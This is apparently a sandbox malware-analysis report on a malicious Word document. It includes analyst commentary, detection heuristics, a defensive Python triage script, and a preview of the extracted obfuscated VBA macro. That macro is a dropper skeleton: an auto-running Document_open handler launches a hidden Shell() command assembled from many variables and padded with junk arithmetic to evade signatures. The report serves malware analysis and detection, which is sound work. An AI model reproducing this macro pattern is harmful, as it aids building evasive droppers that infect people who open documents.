MALICIOUS
Risk Score: 222
MITRE ATT&CK: T1059.005 (Command and Scripting Interpreter: Visual Basic)

Malware Insights
ClamAV identifies the sample as malicious with the signature Doc.Dropper.Agent-6616613-0. Static analysis found VBA macros, including a Document_open handler, which Word runs automatically when the document is opened (once macros are enabled) and which calls Shell(). The command passed to Shell() is assembled at run time by concatenating nearly thirty variables; the only literal visible in the extracted source is "c" (wrapped in CVar), and the second argument is 0 (vbHide), so the launched process gets no visible window. None of those variables is assigned anywhere in the visible preview, so the actual command line and any download URL cannot be recovered from this static view; recovering them requires the remaining module streams, any document properties or form fields the macro may read, or dynamic execution in a sandbox. The other procedures contain only arithmetic on undeclared variables under On Error Resume Next and do no useful work; they are padding meant to defeat signature matching and slow down review. A hidden Shell() launched from an auto-exec handler is the typical shape of a dropper that downloads and runs a secondary payload.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6616613-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6616613-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Shell() call in VBA [critical, OLE_VBA_SHELL]: Shell() call in VBA
- Document_Open macro [high, OLE_VBA_DOCOPEN]: Document_Open macro; the procedure runs as soon as the document is opened, so no further user interaction is needed once macros are enabled
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace identifier present in any Office file with drawing content; it is not a network indicator and should not be treated as a download or C2 URL.
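To reproduce the OLE_VBA_DOCOPEN and OLE_VBA_SHELL findings above on the decoded source, here is an added Python triage script; it is not the analyzer's or oletools' own code. It takes the text olevba writes out (the macros.bas artifact below), locates auto-exec procedures, flags execution primitives, and for each Shell() call records the window style and how many concatenated terms build the command, together with the share of padding statements of the shape seen in the preview. SAMPLE_VBA is a constructed miniature of the macro above with illustrative names; the p-code heuristic is not reproduced because it needs the compiled stream rather than source text.

```python
# Added example (not the analyzer's or oletools' code): triage of VBA source
# as decoded by olevba. Re-creates the OLE_VBA_DOCOPEN / OLE_VBA_SHELL style
# checks over source text only; compiled p-code streams are out of scope.
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Procedures Word/Excel run without user interaction once macros are enabled.
AUTOEXEC = {"document_open", "document_close", "document_new", "autoopen",
            "auto_open", "autoclose", "auto_close", "autoexec", "autoexit",
            "workbook_open", "workbook_beforeclose"}
# Execution/download primitives; the key is the name reported in findings.
EXEC_TOKENS = {"Shell": r"\bShell\b", "CreateObject": r"\bCreateObject\b",
               "URLDownloadToFile": r"\bURLDownloadToFile\w*", "XMLHTTP": r"\bXMLHTTP\b",
               "PowerShell": r"\bpowershell\b", "CallByName": r"\bCallByName\b"}
PROC_START = re.compile(r"^(?:(?:Private|Public|Friend)\s+)?(?:Static\s+)?(Sub|Function)\s+(\w+)\s*\(", re.I)
PROC_END = re.compile(r"^End\s+(?:Sub|Function)\b", re.I)
# Padding statement shape from the sample: name = (N - a / b - c - (N + d + e / f))
JUNK = re.compile(r"^\w+\s*=\s*\(\s*\d+\s*-\s*\w+\s*/\s*\w+.*\)$")
# Shell as a statement, "Call Shell", or assigned "x = Shell(...)"
SHELL_CALL = re.compile(r"^(?:\w+\s*=\s*)?(?:Call\s+)?Shell\b\s*(.*)$", re.I)


def split_top_level(expr: str, sep: str) -> List[str]:
    """Split on sep, ignoring separators inside parentheses or "string" literals."""
    parts, cur, depth, in_str = [], [], 0, False
    for ch in expr:
        if ch == '"':
            in_str = not in_str
        elif not in_str:
            if ch == "(":
                depth += 1
            elif ch == ")":
                depth -= 1
            elif ch == sep and depth == 0:
                parts.append("".join(cur).strip())
                cur = []
                continue
        cur.append(ch)
    parts.append("".join(cur).strip())
    return parts


@dataclass
class ShellCall:
    proc: str
    line_no: int
    window_style: Optional[int]  # 0 is vbHide: the launched process gets no window
    operands: int                # terms concatenated (+ or &) into the command
    literals: List[str]          # string literals visible in the command expression


@dataclass
class Report:
    procedures: List[str] = field(default_factory=list)
    autoexec: List[str] = field(default_factory=list)
    exec_hits: Dict[str, List[str]] = field(default_factory=dict)
    shell_calls: List[ShellCall] = field(default_factory=list)
    junk_ratio: float = 0.0  # share of statements that are padding arithmetic

    def verdict(self) -> str:
        # Shell() inside an auto-exec procedure is the critical combination.
        if any(c.proc.lower() in AUTOEXEC for c in self.shell_calls):
            return "critical"
        if self.autoexec and self.exec_hits:
            return "high"
        return "medium" if self.exec_hits else "info"


def analyze(vba_source: str) -> Report:
    rep, current, statements, junk = Report(), None, 0, 0
    for line_no, raw in enumerate(vba_source.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("Attribute ") or line.startswith("'"):
            continue
        start = PROC_START.match(line)
        if start:
            current = start.group(2)
            rep.procedures.append(current)
            if current.lower() in AUTOEXEC:
                rep.autoexec.append(current)
            continue
        if PROC_END.match(line):
            current = None
            continue
        if re.match(r"On\s+Error\b", line, re.I):
            continue  # error suppression is not a statement worth counting
        statements += 1
        junk += bool(JUNK.match(line))
        proc = current or "<module>"
        for name, pattern in EXEC_TOKENS.items():
            if re.search(pattern, line, re.I):
                hits = rep.exec_hits.setdefault(proc, [])
                if name not in hits:
                    hits.append(name)
        call = SHELL_CALL.match(line)
        if call:
            args_text = call.group(1).strip()
            if args_text.startswith("(") and args_text.endswith(")"):
                args_text = args_text[1:-1]  # Shell("cmd", 0) call form
            args = split_top_level(args_text, ",")
            style = int(args[1]) if len(args) > 1 and args[1].isdigit() else None
            terms = [t for p in split_top_level(args[0], "+")
                     for t in split_top_level(p, "&") if t]
            rep.shell_calls.append(ShellCall(proc, line_no, style, len(terms),
                                             re.findall(r'"([^"]*)"', args[0])))
    rep.junk_ratio = junk / statements if statements else 0.0
    return rep


# Constructed miniature of the macro shown in the preview (names are illustrative).
SAMPLE_VBA = '''Attribute VB_Name = "ThisDocument"
Private Function PadOne()
On Error Resume Next
aaa = (96880 - bbb / ccc - ddd - (68923 + eee + fff / ggg))
hhh = (14253 - iii / jjj - kkk - (66205 + lll + mmm / nnn))
End Function
Private Sub Document_open()
On Error Resume Next
ooo = (93485 - ppp / qqq - rrr - (75193 + sss + ttt / uuu))
Shell "" + partA + partB + CVar("c") + partC, 0
End Sub
'''

if __name__ == "__main__":
    r = analyze(SAMPLE_VBA)
    print(r.verdict(), r.autoexec, r.exec_hits, r.junk_ratio)
    for c in r.shell_calls:
        print(c)
```

Run it against the real macros.bas with `analyze(open("macros.bas", errors="replace").read())`: a high junk ratio, a single Shell() call with window style 0 whose operand count is large while its literal list is nearly empty, is exactly the profile of the sample above, and the verdict logic mirrors why the page rates the Document_Open plus Shell() pair as critical.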
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 53046 bytes | 6692cda462aaa2738ce8e1f25d3270e4638314eb60e93b4c94214736b5bc0c6e |

Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "LjRpninnAwGiIj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function SvlwRVJiLq()
On Error Resume Next
GjYccm = (96880 - ZtiGLf / hLFoX - uCjar - (68923 + wKLKQ + BDzfr / QUWlDn))
QrwYa = (14253 - ViVhq / CppGcU - WzEzSG - (66205 + iqiBU + OwSjTq / wqzNuw))
AtnLzm = (46884 - ioCkC / zPhYqC - OijOEH - (10020 + QfmGF + EWALi / pYKdGh))
UXiWhh = (35885 - BFUYLm / qjWVnt - ZJdwa - (13885 + jXITW + Svimu / JRbzRo))
HEfzi = (99856 - LGwuiT / OIPizp - sjNLRo - (80294 + DIXlj + LAoYF / sQDQz))
End Function
Private Function wIXhGnoCjoX()
On Error Resume Next
GWclNO = (30328 - JWpLt / LlwdfU - zGXCv - (29471 + AIFoV + vaiWzw / jDZwnt))
TQFLNt = (86404 - clBuA / bzGPRK - BLzkiC - (71274 + PHhwnV + dwCBjN / TsjaHC))
fwQjjC = (1305 - HKFHUA / UvvrJY - bUWrvJ - (89648 + stELzK + aTVXo / zSZlnv))
pMRwRF = (10250 - jqHiMi / vNcvW - MQilL - (84981 + ADviz + RVhqE / XXTKYi))
qPCQz = (27056 - QEjSz / QBRBq - wkHcih - (67424 + vhaPCF + KtCYVj / KZnhzZ))
tjIZAX = (92516 - rHrsV / MCJBi - UcWlj - (78975 + BzGINM + zNwlw / ERbNjv))
HvwzL = (39351 - nYiQfL / iUQtNF - PdULK - (50643 + oziJPu + fSEtd / FdpEEd))
End Function
Private Function oNfHTpcvnL()
On Error Resume Next
FAHzj = (62267 - QcAaJZ / GdpWKt - PqGXvD - (27584 + IGGAj + IiDZH / GiimL))
wwPqiI = (81527 - oPqdiH / NDMZrf - cGMWRK - (76915 + XsEDz + sVqrA / fnRFuz))
wafvZ = (63347 - MwNXXU / ltFFCh - iMqQa - (58152 + pZuizN + wnPwB / cZapHn))
DEINp = (11500 - pJAZn / hJTtUI - LwzmzD - (61389 + kIULsh + CAtRv / jzddl))
iqhJX = (18787 - OpfwC / WZTsY - YoGqG - (453 + bIlAIn + XHiMV / DKhzjA))
zLoSDK = (18178 - FVPla / EAfOuv - HSACN - (64569 + wVILZA + ZTCHiY / widfU))
End Function
Private Sub Document_open()
On Error Resume Next
zStrL = (93485 - roCUPv / avNPG - mKtcJm - (75193 + oLtOsG + ELtoKX / TKaCUS))
MHYbj = (74877 - RiYJo / dJGXo - WkUbw - (38961 + qiCGS + ccwlp / XIfuK))
MIAMp = (60831 - KMWwKd / YNGIm - UhVivI - (61724 + SciaY + EzRpB / aAiPs))
fBZFU = (27826 - linRQ / zisjnV - LwawRH - (53443 + TzGqF + AzsXO / AjZKz))
Shell "" + XpATffIzbsfc + wqObFoMbfX + CVar("c") + RBqpJLul + hianMdA + jjXAVw + GVNPKra + najLwBrK + ZtzGmqUjd + pwnAdOh + CFaRqrZnSwl + msGjo + kzVAqBbPmDz + jNHpi + wwIbNjUzB + iqvojz + wbNzF + wJMRlwtjA + AZbjsQf + btdDBFmzbc + AYWBFzTTbuY + GrSRazRJszB + PIfTkFR + wcvSuwTcE + qUzWlmPS + qJMvr + lICGVfSIqT + IqUtqSm + rIwbXDsh + nMmPRfjbKdz, 0
LYJlfY = (31111 - smRQLA / TCKTYP - BZlPud - (47227 + rLIIn + NRNIK / vaVwFi))
End Sub
Private Function CiwtsuRXMvNpsI()
On Error Resume Next
ZoUVR = (25877 - qIRcXj / EjGSM - fKJiO - (68219 + LAzfT + LfzvR / bYfvzp))
pksKo = (9472 - LhXia / tCTun - urzlzq - (75075 + OzJXsB + LAhRKz / nMVLq))
nRRhi = (94044 - lPflH / naqKlJ - YsGop - (68440 + pzOMtK + lujQAW / aPSJJ))
suuFR = (23219 - qztTBZ / NYApZ - hBldct - (54058 + mPnAo + WDORb / LVBozJ))
End Function
Private Function SfLkbWjA()
On Error Resume Next
PjbBV = (77438 - ZOzsT / PKunSN - HdJdS - (14994 + bbiow + kiTmi / XqwKnF))
dwPzW = (81761 - aPUiUk / Rjzquo - aILwOL - (91121 + oPuSi + zCEtB / icXfj))
mYivFH = (6183 - bFlzK / jpbDm - PbQGY - (61732 + YLjdQz + YHQiQq / RbCWU))
wrYDm = (6816 - DnEDH / EWbEoC - bTdtz - (87302 + OzlfMP + wLPMHO / DJwBl))
ACFGpd = (41268 - mWzjN / hzjIv - OhrHE - (69154 + UJTWYj + PYWYz / tUwwp))
AmvfOG = (27338 - HXWZK / CubUzj - bYznvH - (96608 + NkDLz + YlzCr / NztIq))
wIBai = (19443 - iTLwCF / AFSAZA - IIaKJb - (20619 + kuSEPr + IsrND / wNXWth))
End Function
Private Function plMjChuLdsvLTl()
On Error Resume Next
RTZDjm = (91055 - zAwkvL / tlltMm - dvWIau - (89155 + HvSZBa + WcVOPw / QHkab))
szDCj = (13713 - kmowdn / fiwsKd - NHwrjG - (45153 + LtoOz + MzlQi / ctOiRX))
hnHLop = (58024 - aLAiMs / RVJWF - JYwWf - (22648 + OYATzw + ILONk / qBJN
... (truncated)